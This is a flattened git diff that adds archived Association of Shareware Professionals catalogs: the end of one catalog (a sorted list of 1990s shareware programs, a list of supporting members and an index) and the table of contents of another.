Quick Fortunes 1.1 (06-15-96) R.K. West Consulting + QUIK-INSTALL 2.0 (12-07-93) Michael L. Wester + Quilt 1.32 (04-09-92) Cascoly Software + R&R School Master for Windows 1.04 (02-11-96) R&R EdWare + RADIOSIM 3.0 (04-01-95) BREMENSON + RANGER TRACKER 2.0 (07-08-94) Robert Barrentine Consulting + Ravitz Editor 1.10b (08-12-93) Ravitz Software Inc. + READ 3.2 (01-17-96) Robert Lindsay Wells + REALIZE 1.0 (09-21-94) Transcendental Technologies + Recap 5.1 (08-14-95) R.K. West Consulting + RECIPE FILE MANAGEMENT 3.3 (02-01-94) First Step Software + Recon 2.50 (09-19-94) Amdox Corp. + Red Hand 1.0 (04-11-96) Hard-Drive Software + REFILE 3.1 (04-17-94) MegAS Corporation + Report Utility for Paradox/DOS 2.04 (02-12-94) The C Group, + Inc. + RESTAURANT COST CONTROL 4.2 (01-15-94) First Step Software + Resume Master Deluxe 4.0 (02-01-94) Whirlwind Technologies + Rev. Lowell's Treasury of Humor 1.01 (03-01-95) Bardon Data + Systems + RexxBase 2.00 (05-15-95) American Coders, LTD. + RI-VB Database Toolkit v1.1 1.1 (02-15-95) MIS Resources + International + The Richard Webster System 4.1 (09-30-95) R.K. West Consulting + The Right Resume 1.0c (05-01-95) Whirlwind Technologies + RISS Font Pak #1 1.3 (02-25-94) Rhode Island Soft Systems, + Inc. + RISS Icon Pak 1.3 (05-02-94) Rhode Island Soft Systems, Inc. + RoboCrap.v94 1.00 (01-02-95) Second Career Software + Rockford! 3.5 (05-01-94) OsoSoft + Rolodeck 1.0 (05-03-95) Henning Associates + Rosenthal UnInstall 1.0 (04-25-94) Rosenthal Engineering + Rosenthal WinLite 1.0 (10-24-93) Rosenthal Engineering + RoText VBX 1.3 (08-14-94) Mabry Software + Roxie's ABC Fish 1.2 (11-20-95) LatticeWork Software + + Appendix E, "Sorted list of all programs" 751 + + + + Roxie's ABC Fish 1.2 (11-20-95) LatticeWork Software + Roxie's Math Fish 1.2 (11-15-95) LatticeWork Software + Roxie's Math Fish 1.2 (11-15-95) LatticeWork Software + Roxie's Reading Fish 1.2 (11-15-95) LatticeWork Software + Roxie's Reading Fish 1.2 (11-15-95) LatticeWork + Software + RPF Zip Control 2.1.5 (12-03-94) RPF Software + RPMSHARE 3.42 (12-05-94) South Pointe Software + RRKeyCaps & RRKeySampler (PST1) 2.0 (07-24-94) RoadRunner + Computing + RRKeyCaps & RRKeySampler (TT) 2.0 (07-24-94) RoadRunner + Computing + RRKeyCapsGerman (PST1) 2.0 (07-24-94) RoadRunner Computing + RRKeyCapsGerman (TT) 2.0 (07-24-94) RoadRunner Computing + RRMacCaps & RRKeySampler (PST1) 2.0 (07-24-94) RoadRunner + Computing + RRMacCaps & RRKeySampler (TT) 2.0 (07-24-94) RoadRunner + Computing + Rubicon Publisher 2.2C (06-08-91) Rubicon Computer Labs Inc. + RUF100.ZIP 1.0 (03-31-95) MIS Resources International + S.O.S. Personal Edition 1.1 (03-26-95) Tay-Jee Software + Corporation + SAB Diskette Utility 2.50 (01-01-94) Stewart A. Berman + SAC DATABASE 2.7.2 (07-20-95) C & R Business Systems Ltd. + Safe Program 1.00 (07-01-95) Regnoc Software + Sales & Samples 1.0 (04-01-94) C T Johnson, Inc + SC-Scripter 1.0 (08-27-94) SplitCycle Computing + SCBA Trak 2.40 (01-28-95) Raymond A.J. Pesek + Schooner 2.50 GUI (03-14-95) Jonathan Cook + SCP 1.04 (11-18-94) Christopher J. Noyes Software + Screen Saver Sampler 2.0 (01-01-95) Damsel Software Group + ScrollZ 2.10 (09-01-94) Unicorn Software Limited + Search-N-Store 3.4 (06-14-94) Shawn Anderson SoftWare + Seascape 3.0 (12-02-95) Advanced Computer Tektonics + Second Guess 1.1 (07-10-95) Arcanum Computing + SEE (File Viewer) 5.11 (01-01-96) MicroFox Company + SeekWell Universal Query 1.10 (12-15-95) Informatik Inc. + SensuVoX I 0.00 (01-29-95) Unicorn Software Limited + Serial File Copy 3.5 (06-01-94) MarshallSoft Computing, Inc. + SETUP.EXE - Free 19k Bootstrap 4.6 (08-12-95) Chapter One + Developments Ltd. + ShareMan 1.7 (07-30-95) Cordes Development + Shareware Programmer's Guide n/a (05-21-92) Association of + Shareware Professionals + Shareware Reference Guides n/a (01-01-80) Association of + Shareware Professionals + Shareware Tracker 3.11 (11-05-93) RMH Computer Services + Shell 1.2.3 (07-20-95) C & R Business Systems Ltd. + SHERLOCK 2.73 (12-28-93) Gulf Sierra + SHIP TRACKER 1.2 (03-15-93) Robert Barrentine Consulting + Shooting Gallery 3.3 (02-07-95) Arcanum Computing + ShotZ 3.00 (01-15-92) Unicorn Software Limited + Silver Wolf Desktop 1.2 (12-15-95) Silver Wolf Software + SkyMap 2.1 (07-01-94) Christopher A. Marriott + + Appendix E, "Sorted list of all programs" 752 + + + + SLIB10.ZIP 1.0 (03-31-95) MIS Resources International + SMALL BUSINESS ADVISOR 94.4 (10-15-94) RONIN Software + Smart10 2.1 (10-02-94) Sympathetic Software + SmartDraw 2.07 (04-08-96) SmartDraw Software Inc. + SmartDraw 95 2.07 (04-08-96) SmartDraw Software Inc. + SmartTracker Books 2.5 (12-20-95) Insight Software Solutions, + Inc. + SmartTracker Coins 2.5 (12-20-95) Insight Software Solutions, + Inc. + SmartTracker Inventory 2.5 (12-20-95) Insight Software + Solutions, Inc. + SmartTracker Stamps 2.5 (12-20-95) Insight Software Solutions, + Inc. + SmartTracker Videos 2.5 (12-20-95) Insight Software Solutions, + Inc. + SmilerShell 3.0 (03-29-95) Bardon Data Systems + SNAKE 1.0 (10-01-94) Chatfield Software, Inc. + Snooper 3.40 (06-21-95) Vias and Associates + Solo Peg 1.0 (05-24-96) R.K. West Consulting + SoundMasterDb 2.02 (09-14-92) TurboSystemsCo + SoundX VBX 1.3 (08-14-94) Mabry Software + SoundZ 4.00 (09-01-94) Unicorn Software Limited + SoundZ For Windows 2.15 (03-09-95) Unicorn Software Limited + Space Explorer Screen Saver 1.20 (11-12-95) Tay-Jee Software + Corporation + SPANISH DRILL! 1.8 (11-09-93) LONE WOLF ENTERPRISES + Spanish Helper Level One 1.6 (11-16-95) G.B. Blanchard + SpeedBack 2.3 (02-12-93) MicroTools Inc + SQWEZ 1.0 (04-16-94) JM Software + STACKEY 4.0 (12-23-91) CTRLALT Associates + StarFlic 1.2 (04-14-94) TRIUS, Inc. + StatTrak for Baseball 5.3 (01-15-95) ALL-PRO Software Inc. + Steam Properties 1.0 (06-28-95) + STEENBURGH's STUFF 3.5 (02-01-96) Tay-Jee Software Corporation + StockQuest 2.10 (07-25-95) Informatik Inc. + Stowaway True Archival System 2.2 (07-29-93) Patri-Soft + Sub-contracor Billing 2.2.1 (07-20-95) C & R Business Systems + Ltd. + Super Marble Solitaire 1.2 (01-29-96) Wrenware + Super VGA Puzzle 2.04 (05-14-94) Cascoly Software + Super!Market 1.30 (04-05-96) Trulli Tops Software, Inc. + SuperDIR 1.1 (08-20-95) Cottonwood Software + SuperFly 2.1 (09-01-94) Arcanum Computing + SuperSet - Environment Extender 1.1 (02-01-95) Ross Leidy + Swimsuit 1.1 (09-15-95) Cascoly Software + SysChk 2.38 (09-01-93) Advanced Personal Systems + System Monitor 3.0 (10-24-93) Rosenthal Engineering + Tag Line Xpress 4.00 (05-20-94) Ron Janorkar + Tangram 1.1 (04-15-94) Judah Warshaw + TC's Personal Data Manager 1.20 (02-17-95) Specific + Applications Software + TC's Toolbox 2.4 (09-22-95) Specific Applications Software + Teach Your Children 2.0 (02-06-95) Q&D Software Development + Technical Editor (DOS) 2.80 (08-15-94) On-Target Software + + Appendix E, "Sorted list of all programs" 753 + + + + Technical Editor (OS/2) 2.80 (08-15-94) On-Target Software + Technical Editor (Windows NT) 2.80 (08-15-94) On-Target + Software + Teleshare/DOS Remote Access 3 (06-01-95) P. C. Softsmith + TextPad 16 1.30 (09-02-95) Helios Software Solutions + TextPad 32 1.30 (09-02-95) Helios Software Solutions + Textshot 4.0 (02-03-95) McAdams Associates + Thoroughbred Handicapper Pro 2.1 (06-15-94) Whirlwind + Technologies + TIFFmaker 1.10 (12-10-95) Informatik Inc. + Tile Match 1.2 (09-01-94) Arcanum Computing + Time is Money 2.3 (12-07-94) Custom Data Solutions + Time Keeper 2.7 (10-07-95) Custom Computer Solutions + Timeclock I 2.4s (04-15-94) Faught Data Systems, Inc. + Tolman Dental Program 5.0 (04-01-94) Peter T. Smith D.D.S. + TommySoftware CAD/DRAW 2.04E (06-01-95) TommySoftware, N.A., + Inc. + TommySoftware CAD/DRAW 4 Level1 4.00e (09-12-95) + TommySoftware, N.A., Inc. + TommySoftware Tek Illustrator 3.16e (06-01-95) TommySoftware, + N.A., Inc. + Toolbar 2X for Word 6 2.0 (06-01-96) AMF + Top Draw 3.1 (05-01-96) Top Software + Total Investor for 1-2-3 DOS 2.1 (11-12-93) Hughes Financial + Services + Total Investor for 1-2-3 Window 3.0 (08-17-95) Hughes + Financial Services + Total Investor for Symphony 2.1 (09-10-93) Hughes Financial + Services + Towers 1.27 (02-20-93) Cascoly Software + TrackEquip 1.10 (04-30-96) John A. Tulley + TRAINER 1.9 (12-16-95) Nine-Patch Software + TRAINING TRACKER 3.0 (02-02-95) Robert Barrentine Consulting + TreeChart 2.00 (08-23-94) FineLine Software + TreeDraw 1.11 (09-04-95) SpanSoft + TreePlan for DOS 2.1 (08-12-93) Decision Support Services + TROOP TRACKER 5.0 (09-10-95) Robert Barrentine Consulting + TROOP TRACKER 4 GIRLS 2.0 (12-20-94) Robert Barrentine + Consulting + TRUE MULTIPLE-CHOICE 2.4 (01-05-96) Nine-Patch Software + TRUE MULTIPLE-CHOICE DOS 2.3 (12-20-95) Nine-Patch Software + TURBO TPU TOOLKIT! 1.5 (03-01-94) LONE WOLF ENTERPRISES + TURF.v93 1.01 (05-14-94) Second Career Software + TUTOR.COM 4.5 (05-01-91) Computer Knowledge + U.S. Geography Tutor 1.0 (04-01-94) On-Target Software + UDECIDE 1.06 (11-10-92) Cascoly Software + ULTIMATE BACCARAT 2.0 (03-15-94) Accidental Software + ULTIMATE BLACKJACK 3.0 (03-15-94) Accidental Software + ULTIMATE GIN 1.42 (03-15-94) Accidental Software + UltiMenu 1.00 (08-19-94) Ron Janorkar + Units & Volumes 1.1 (08-01-95) X Libris + Universal Install 2.0 (05-10-94) The GoodSoft Co. + VAR Grade 6.04B (11-15-95) VARed Software + VAR Grade for Windows 1.02A (11-15-95) VARed Software + + Appendix E, "Sorted list of all programs" 754 + + + + Variable Investment Analyst 5.92 (04-01-95) Will Baldwin + Vehicle Costs 2.4 (05-01-94) Graham Ferguson + Vending Machine 1.5 (06-17-95) Lincoln Beach Software + Verbal Vanquish 2.03 (09-23-95) James Bair Software + VERSAMAP 1.51 (11-15-95) Charles H. Culberson + Version Control & Maintenance 2.8.1 (07-20-95) C & R Business + Systems Ltd. + Video Librarian 4.02 (12-31-93) TurboSystemsCo + VideoMaster 9.00 (11-29-94) Unicorn Software Limited + VideoMaster For Windows 2.21 (04-19-96) Unicorn Software + Limited + ViDir/ViRes File Monitor System 1.02 (02-28-94) Vahnzinn + international + VIEW_MAN 1.10 (10-31-94) MicroMetric + Virus Simulator 2C (01-01-93) Rosenthal Engineering + VIRUS: The Game 1.2 (01-09-96) DynoTech Software + Visual Calendar Planner 1.1 (02-10-94) Bok Nan Lo + Visual Illustrations 1.1 (10-01-95) Impact D. Publishing + VMS40 - EMS emulator (disk) 1.2 (04-05-94) Fugue Software + VPT 4.15 (12-29-91) clySmic Software + VuGrafix Image Viewer 1.30 (12-10-95) Informatik Inc. + WALL STREET RAIDER 4.2 (04-30-94) RONIN Software + Wall Street Simulator - Windows 1.00 (06-25-94) Larax Software + Water and Steam Properties 1.2 (08-12-94) Katmar Software + WCanasta 1.44 (01-01-96) Wilfried Lotermoser Software + WDiff 1.40 (01-25-96) C.Sitte Softwaretechnik + WebForms 1.0h (06-15-95) Q&D Software Development + WebParse 1.4 (12-15-95) Informatik Inc. + WebPen 1.10 (12-28-95) Informatik Inc. + WEBS 1.2 (06-11-92) Cascoly Software + wfListen 3.31 (11-05-95) Prodigy Computing + wfStatus 1.20 (11-11-95) Prodigy Computing + WhizNotes 2.14 (10-23-95) Advanced Supprt Group, Inc. + Wilbur 1.41 (07-06-96) RedTree Development Inc. + Win Change 3.6 (09-30-94) JRE Enterprises + Win Multiple Configurations 6.2 (10-05-94) JRE Enterprises + WinAlter 2.1 (11-11-95) James Bair Software + WinBrowse 1.6a (04-17-95) Q&D Software Development + WinCap+ 1.00 (05-01-95) The CodeWorks+ Ltd. + WinCharging 2.0 (03-24-96) My Little Realm Enterprises + WinClip 3.5 (04-15-94) OsoSoft + WinCopy Screen Capoture 1.40 (12-10-95) Informatik Inc. + WinDatCon 2.0 (04-18-94) Vogel Scientific Software + The Window BOSS & Data Clerk 8.02 (08-15-94) Star Guidance + Consulting, Inc. + Windows Gourmet 1.2 (01-01-95) Dovcom + Windows Lotto Pro 3.5 (11-01-95) Data Solutions + The Wine Window 1.2 (08-01-95) Prospect Software + WINFAX PRO and Word Fax Macro 7.0 (06-01-96) AMF + WinFlash 3.0 (12-21-93) Open Windows + WinJottr 1.0 (04-10-94) Open Windows + WinKillr 1.1 (10-29-95) Open Windows + WinNET Mail for MS Windows 2.11 (03-24-94) COMPUTER + WITCHCRAFT, INC. + + Appendix E, "Sorted list of all programs" 755 + + + + WinOCR 2.0b (09-20-93) SoftTech + WINPAK #1 1.2 (01-20-93) Rhode Island Soft Systems, Inc. + WinPrice 1.0 (02-10-94) Open Windows + WinProof 1.0C (01-28-94) Intellect Systems + WinSecure 2.0 (03-01-94) ViewPoint Software, Inc. + WinSol Plus 1.02 (12-09-95) Daniel Thomas + WINstall 1.0a (11-01-94) Dovcom + WinUpD8R 4.2 (02-13-96) Open Windows + Winvelope 5.0 (06-04-95) Winvelope Software + WInvoices 1.0d (05-31-95) Q&D Software Development + WINZLE 1.10 (09-15-95) Cascoly Software + Wndlib 1.0 (03-25-94) Burnham Park Software, Inc. + Wonder Word 1.2 (08-05-95) Software Avenue, Inc. + Word Fugue 3.1 R1 (11-27-95) Fugue Software + Word Search Construction Kit 2.0 (12-20-95) Insight Software + Solutions, Inc. + Word Search Puzzle Maker 2.6 (10-05-95) Impact D. Publishing + Word Search Rampage 3.0 (01-10-96) Insight Software Solutions, + Inc. + Word Wrestle 1.1 (01-10-96) Insight Software Solutions, Inc. + WordLink(TM) 1.0 (09-25-95) Redei Enterprises + WORDS 1.0 (01-09-96) DynoTech Software + Wordware for Word for Windows 96 (06-01-96) AMF + Workbase 4.31 (01-01-96) R.K. West Consulting + World Clock 2.1 (04-08-96) Hard-Drive Software + WRITE CHINESE 1.00 (05-18-94) Awareness Productions + Writer's Cramp 2.2 (09-30-94) JRE Enterprises + Wynter Stone's I Ching 1.2 (02-17-95) R.K. West Consulting + Wynter Stone's Quick Guide 1.6 (11-17-94) R.K. West Consulting + x-CAL3 3.31 (05-01-95) Extensions Software Corporation + x-CON3 1.44 (05-01-95) Extensions Software Corporation + x-FILE3 1.74 (05-01-95) Extensions Software Corporation + x-FONE3 2.18 (05-01-95) Extensions Software Corporation + x-FONE4 1.25 (06-18-95) Extensions Software Corporation + x-FORUM3 1.28 (05-01-95) Extensions Software Corporation + x-FORUM4 1.12 (06-18-95) Extensions Software Corporation + x-NEWS3 1.57 (05-01-95) Extensions Software Corporation + x-OUT3 1.44 (05-01-95) Extensions Software Corporation + x-OUT4 1.31 (06-18-95) Extensions Software Corporation + x-SKED3 1.58 (05-01-95) Extensions Software Corporation + XED 1.1b (08-24-94) David L. Dight + XferPro 1.1.1 (06-12-96) Sabasoft, Inc. + XFile 2.00 (03-15-95) Phase 33 Digital, Inc. + XFIRE: Action Puzzle game 1.02 (11-30-93) Cascoly Software + XYSee 4.0a (09-04-94) Insight Advantage + Yellow Sticky for Windows 4.5 4.53 (04-22-96) Henning + Associates + Your ESP Test 1.5 (05-19-95) R.K. West Consulting + Z & Z Color 3.2 (03-15-96) Z & Z Software + Z & Z Puzzle 1.1 (03-15-96) Z & Z Software + Zip Express 1.1 (02-01-96) Insight Software Solutions, Inc. + ZIP Fugue (DOS) for PKZIP/UNZIP 1.22 (05-21-94) Fugue Software + ZIP Fugue (Windows) 2.0.7 (11-07-95) Fugue Software + Zip Pro 1,0 (11-22-94) Synaptek Software + + Appendix E, "Sorted list of all programs" 756 + + + + Zip Server(TM) 1.5 (09-30-95) Redei Enterprises + ZiPaper 1.3c (12-30-91) Daniel Thomas + ZipInf VBX 1.1 (08-14-94) Mabry Software + ZIPKEY 2.04e (05-01-93) Eric Isaacson Software + Zippidy Do Da(tm) 1.3 (02-27-95) SMI Corporation + Zpeller 4.10 (01-01-95) Unicorn Software Limited + + Appendix F, "Supporting Members" 757 + + + + + + Appendix F + Supporting Members + + The Association of Shareware Professionals expresses a special + thanks to the following supporting members: + + + Authors: + David Berdan - ExpressWare Corporation + Richard Cherry Jr. - Cherry Tree Software + Phil Katz - PKWARE, Inc. + Sammy Mitchell - SemWare + + Vendors: + Die Deutsche Software Bibliothek + George Margelis - Bugetware + Gregory N. Wilson - Big Byte Software + Mohiyel-Din Hussein - Husco + Michael C. Comish - Software Excitement! + Arthur Tendler - The $5 Computer Software Store + + BBSs: + Don W. Watkins - CompuServe (IBMNET) + Tess Heder, Brian Miller - Channel 1 + Jon H. Larimore - GLIB + Bruce Jackson - The Break + Dave Harrison - Metro Online + Neil Fleming - Canada Remote Systems + + Index 758 + + + + + + + + Index + + 80286 utilities See: Norton's NDOS See: + Utilities, Hardware Utilities, Software + utilities, tools & add-ins, For JP + 286/386/486-specific Software + 80386 utilities See: + Utilities, Hardware O + utilities, Optical character + 286/386/486-specific recognition See: + 80486 utilities See: Graphics, Business + Utilities, Hardware applications, OCR + utilities, applications + 286/386/486-specific + P + A ProDev*QUOTE 285 + ASP 161 + ombudsman 634 Q + quotations 161 + C + CompuServe 634 R + Crossword Creator 187, 188 RAM utilities See: + Utilities, Hardware + D utilities, CPU & memory + D86 Debugger 388 Restore See: Utilities, + File utilities, Backup/ + H restore + Handicapped See: retail software 161 + Utilities, Special needs + S + M Soft fonts See: Utilities, + MCGA utilities See: Printer utilities + Utilities, Hardware + utilities, Screen, EGA/ T + VGA specific Trojan horse See: + Memory utilities See: Utilities, Security + Utilities, Hardware programs + utilities, CPU & memory + V + N VGA utilities See: + NDOS See: Utilities, Utilities, Hardware + Software tools & add- utilities, Screen, EGA/ + ins, For JP Software VGA specific + \ No newline at end of file diff --git a/textfiles.com/computers/asp9301.txt b/textfiles.com/computers/asp9301.txt new file mode 100644 index 00000000..6abb13df --- /dev/null +++ b/textfiles.com/computers/asp9301.txt @@ -0,0 +1,46679 @@ + + i + + + + + + Contents + + + ASP Shareware Catalog for BBS Users (Master Edition) 2 + + Chapter 1: How to read this catalog 3 + 1.1 Minimum requirements . . . . . . . . . . . . 3 + 1.2 Registration benefits . . . . . . . . . . . . 5 + 1.3 Sample product description . . . . . . . . . 6 + + + Part 1: Shareware Products + + + Chapter 2: Utilities 9 + 2.1 Disk utilities . . . . . . . . . . . . . . . 9 + 2.1.1 Disk cataloging . . . . . . . . . . . . 12 + 2.1.2 Hard disk utilities . . . . . . . . . . 16 + 2.1.2.1 Optimization & defragmentation . . 27 + 2.1.3 Floppy disk utilities . . . . . . . . . 28 + 2.1.3.1 Disk duplicating . . . . . . . . . 32 + 2.1.3.2 Disk formatting . . . . . . . . . . 33 + 2.1.4 Directory utilities . . . . . . . . . . 33 + 2.2 File utilities . . . . . . . . . . . . . . . 35 + 2.2.1 Backup/restore . . . . . . . . . . . . . 40 + 2.2.2 File encryption . . . . . . . . . . . . 44 + 2.2.3 File archiving & compression . . . . . . 46 + 2.2.4 File comparison . . . . . . . . . . . . 56 + 2.2.5 File sorting & conversion . . . . . . . 59 + 2.2.6 File viewers . . . . . . . . . . . . . . 61 + 2.3 Hardware utilities . . . . . . . . . . . . . 68 + 2.3.1 CPU & memory . . . . . . . . . . . . . . 69 + 2.3.2 Keyboard . . . . . . . . . . . . . . . . 71 + 2.3.3 Screen . . . . . . . . . . . . . . . . . 73 + 2.3.3.1 EGA/VGA specific . . . . . . . . . 75 + 2.3.3.2 Screen savers . . . . . . . . . . . 76 + 2.3.3.3 Screen capture . . . . . . . . . . 80 + 2.3.4 286/386/486-specific . . . . . . . . . . 82 + 2.3.5 Sound card . . . . . . . . . . . . . . . 83 + 2.3.6 Serial & parallel port . . . . . . . . . 83 + 2.3.7 CD-ROM . . . . . . . . . . . . . . . . . 84 + 2.4 Printer utilities . . . . . . . . . . . . . . 86 + 2.4.1 Print spoolers . . . . . . . . . . . . . 90 + 2.4.2 Printer control . . . . . . . . . . . . 92 + 2.4.3 UPCs & bar codes . . . . . . . . . . . . 94 + 2.4.4 Envelope addressers . . . . . . . . . . 96 + 2.4.5 Printer specific . . . . . . . . . . . 102 + 2.4.5.1 Epson . . . . . . . . . . . . . . 102 + 2.4.5.2 HP DeskJet . . . . . . . . . . . 103 + 2.4.5.3 HP LaserJet . . . . . . . . . . . 106 + 2.4.5.4 PostScript . . . . . . . . . . . 114 + 2.5 System utilities . . . . . . . . . . . . . 116 + + ii + + + + 2.5.1 Operating systems . . . . . . . . . . 116 + 2.5.1.1 Task-switching . . . . . . . . . 117 + 2.5.2 Multi-OS utilities . . . . . . . . . . 117 + 2.5.3 Command processors . . . . . . . . . . 119 + 2.5.4 Batch & macro utilities . . . . . . . 123 + 2.5.4.1 Batch file compilers . . . . . . 130 + 2.5.5 Configuration utilities . . . . . . . 130 + 2.5.6 Recovery utilities . . . . . . . . . . 135 + 2.5.7 Fonts . . . . . . . . . . . . . . . . 135 + 2.5.7.1 PostScript fonts . . . . . . . . 136 + 2.5.7.2 TrueType fonts . . . . . . . . . 137 + 2.5.8 Other . . . . . . . . . . . . . . . . 140 + 2.6 Desktop utilities . . . . . . . . . . . . . 142 + 2.6.1 Multi-function . . . . . . . . . . . . 143 + 2.6.2 Calculators . . . . . . . . . . . . . 147 + 2.6.3 Calendars . . . . . . . . . . . . . . 149 + 2.6.4 Clocks . . . . . . . . . . . . . . . . 153 + 2.6.4.1 Precision timers . . . . . . . . 153 + 2.6.5 Phone dialers . . . . . . . . . . . . 154 + 2.6.5.1 Rolodex programs . . . . . . . . 158 + 2.6.6 Alarms . . . . . . . . . . . . . . . . 161 + 2.6.7 ASCII charts . . . . . . . . . . . . . 163 + 2.6.8 Notepads . . . . . . . . . . . . . . . 163 + 2.6.9 Personal information managers (PIMs) . 165 + 2.6.10 Time management . . . . . . . . . . . 177 + 2.6.11 Journal/diary programs . . . . . . . 179 + 2.7 Menu systems & file managers . . . . . . . 183 + 2.7.1 Menu systems . . . . . . . . . . . . . 183 + 2.7.2 File managers . . . . . . . . . . . . 190 + 2.7.3 Combined MS/FMs . . . . . . . . . . . 196 + 2.7.4 MS/FMs for developers . . . . . . . . 200 + 2.7.5 Work environment managers . . . . . . 200 + 2.7.6 Software tools . . . . . . . . . . . . 202 + 2.7.6.1 For multiple programs . . . . . . 202 + 2.8 Security programs . . . . . . . . . . . . . 202 + 2.8.1 Virus/Trojan detectors . . . . . . . . 204 + 2.8.2 Virus cleanup/removal . . . . . . . . 205 + 2.8.3 System activity monitors . . . . . . . 205 + 2.8.4 File integrity monitors . . . . . . . 206 + 2.8.5 Computer access security . . . . . . . 207 + 2.9 Software tools & add-ins . . . . . . . . . 209 + 2.9.1 For multiple programs . . . . . . . . 209 + 2.9.2 For operating systems . . . . . . . . 211 + 2.9.2.1 MS-DOS . . . . . . . . . . . . . 211 + 2.9.2.2 Windows . . . . . . . . . . . . . 211 + 2.9.2.3 OS/2 . . . . . . . . . . . . . . 216 + 2.9.3 For JP Software . . . . . . . . . . . 217 + 2.9.3.1 For 4DOS/NDOS . . . . . . . . . . 217 + 2.9.4 For Lotus . . . . . . . . . . . . . . 217 + 2.9.5 For Norton . . . . . . . . . . . . . . 217 + 2.9.5.1 For Norton Utilities . . . . . . 217 + 2.9.6 For PKWARE . . . . . . . . . . . . . . 218 + 2.9.6.1 For PKZIP/PKUNZIP . . . . . . . . 218 + 2.9.7 For Sidekick . . . . . . . . . . . . . 220 + + iii + + + + 2.9.8 For other . . . . . . . . . . . . . . 220 + + Chapter 3: Writing applications 221 + 3.1 Text viewers/readers . . . . . . . . . . . 221 + 3.2 Text editors . . . . . . . . . . . . . . . 221 + 3.2.1 Text/binary editors . . . . . . . . . 229 + 3.3 Text organizers/outliners . . . . . . . . . 230 + 3.4 Word processors . . . . . . . . . . . . . . 232 + 3.5 Desktop publishing . . . . . . . . . . . . 235 + 3.6 Spelling checkers . . . . . . . . . . . . . 240 + 3.7 Dictionaries . . . . . . . . . . . . . . . 242 + 3.8 Thesaurus . . . . . . . . . . . . . . . . . 242 + 3.9 Style checkers . . . . . . . . . . . . . . 243 + 3.10 Bibliography . . . . . . . . . . . . . . . 246 + 3.11 Document boilerplates . . . . . . . . . . 247 + 3.11.1 Resume' . . . . . . . . . . . . . . . 247 + 3.12 Document control & management . . . . . . 248 + 3.13 Creativity & brainstorming . . . . . . . . 249 + 3.14 Writing utilities . . . . . . . . . . . . 251 + 3.14.1 File format translators . . . . . . . 253 + 3.15 Software tools & macros . . . . . . . . . 253 + 3.15.1 For multiple programs . . . . . . . . 253 + 3.15.2 For PC-Write . . . . . . . . . . . . 255 + 3.15.3 For Word . . . . . . . . . . . . . . 256 + 3.15.3.1 Word for Windows . . . . . . . . 256 + 3.15.4 For WordStar . . . . . . . . . . . . 263 + 3.15.5 For WordPerfect . . . . . . . . . . . 263 + 3.15.6 For other . . . . . . . . . . . . . . 267 + + Chapter 4: Spreadsheet applications 269 + 4.1 Spreadsheet programs . . . . . . . . . . . 269 + 4.2 Boilerplates/templates . . . . . . . . . . 272 + 4.3 Spreadsheet utilities . . . . . . . . . . . 272 + 4.3.1 File format translators . . . . . . . 273 + 4.4 Software tools & add-ins . . . . . . . . . 273 + 4.4.1 For multiple programs . . . . . . . . 273 + 4.4.2 For Lotus . . . . . . . . . . . . . . 274 + 4.4.3 For Excel . . . . . . . . . . . . . . 274 + + Chapter 5: Database applications 275 + 5.1 Relational database managers . . . . . . . 275 + 5.2 Flat-file database managers . . . . . . . . 279 + 5.3 Mailing list systems . . . . . . . . . . . 283 + 5.4 Freeform/text database managers . . . . . . 287 + 5.5 Database utilities . . . . . . . . . . . . 289 + 5.5.1 File format translators . . . . . . . 291 + 5.6 Software tools & add-ins . . . . . . . . . 291 + 5.6.1 For multiple programs . . . . . . . . 292 + 5.6.2 For dBASE . . . . . . . . . . . . . . 293 + 5.6.2.1 dBASE III specific . . . . . . . 295 + 5.6.3 For FoxPro/FoxBASE+ . . . . . . . . . 296 + 5.6.4 For Paradox . . . . . . . . . . . . . 299 + 5.6.5 For Clipper . . . . . . . . . . . . . 300 + 5.6.6 For other . . . . . . . . . . . . . . 301 + + iv + + + + 5.7 Other . . . . . . . . . . . . . . . . . . . 302 + + Chapter 6: Data 303 + 6.1 Words . . . . . . . . . . . . . . . . . . . 303 + 6.1.1 Names . . . . . . . . . . . . . . . . 303 + 6.2 Mapping data . . . . . . . . . . . . . . . 303 + 6.3 Corporate data . . . . . . . . . . . . . . 303 + 6.4 Marketing data . . . . . . . . . . . . . . 303 + 6.4.1 Shareware specific . . . . . . . . . . 304 + 6.5 World facts . . . . . . . . . . . . . . . . 304 + 6.6 Zip codes . . . . . . . . . . . . . . . . . 304 + 6.7 Area codes . . . . . . . . . . . . . . . . 305 + 6.8 Census data . . . . . . . . . . . . . . . . 306 + 6.9 Engineering data . . . . . . . . . . . . . 306 + 6.9.1 For mechanical engineering . . . . . . 306 + 6.9.2 For other . . . . . . . . . . . . . . 306 + 6.10 Quotes & anecdotes . . . . . . . . . . . . 307 + 6.11 Encyclopedias . . . . . . . . . . . . . . 308 + 6.12 Software tools & add-ins . . . . . . . . . 308 + 6.12.1 For multiple programs . . . . . . . . 308 + 6.13 Other . . . . . . . . . . . . . . . . . . 308 + + Chapter 7: Business 309 + 7.1 Business finances . . . . . . . . . . . . . 309 + 7.1.1 Business accounting . . . . . . . . . 311 + 7.1.1.1 Accounts receivable . . . . . . . 320 + 7.1.2 Point-of-sale systems . . . . . . . . 320 + 7.1.3 Billing/invoice systems . . . . . . . 324 + 7.1.4 Purchase order systems . . . . . . . . 329 + 7.1.5 Payroll systems . . . . . . . . . . . 331 + 7.2 Inventory systems . . . . . . . . . . . . . 333 + 7.3 Decision analysis tools . . . . . . . . . . 338 + 7.4 Equipment use & maintenance . . . . . . . . 340 + 7.4.1 Computer-use logging . . . . . . . . . 341 + 7.5 Employee management/scheduling . . . . . . 343 + 7.6 Project management . . . . . . . . . . . . 347 + 7.6.1 Project bidding & costing . . . . . . 349 + 7.6.2 Project scheduling . . . . . . . . . . 350 + 7.7 Client management . . . . . . . . . . . . . 352 + 7.8 Organization charts . . . . . . . . . . . . 354 + 7.9 Specific-field systems . . . . . . . . . . 355 + 7.9.1 Construction, installation & repair . 355 + 7.9.2 Farming & ranching . . . . . . . . . . 356 + 7.9.3 Food services . . . . . . . . . . . . 356 + 7.9.4 Hotel/motel management . . . . . . . . 359 + 7.9.5 Legal & law enforcement . . . . . . . 359 + 7.9.6 Library . . . . . . . . . . . . . . . 360 + 7.9.7 Medical & dental . . . . . . . . . . . 361 + 7.9.8 Non-profit businesses . . . . . . . . 361 + 7.9.8.1 Fund raising . . . . . . . . . . 361 + 7.9.9 Political parties . . . . . . . . . . 362 + 7.9.10 Real estate . . . . . . . . . . . . . 362 + 7.9.11 Safety & fire protection . . . . . . 364 + 7.9.12 Small businesses . . . . . . . . . . 365 + + v + + + + 7.9.13 Other . . 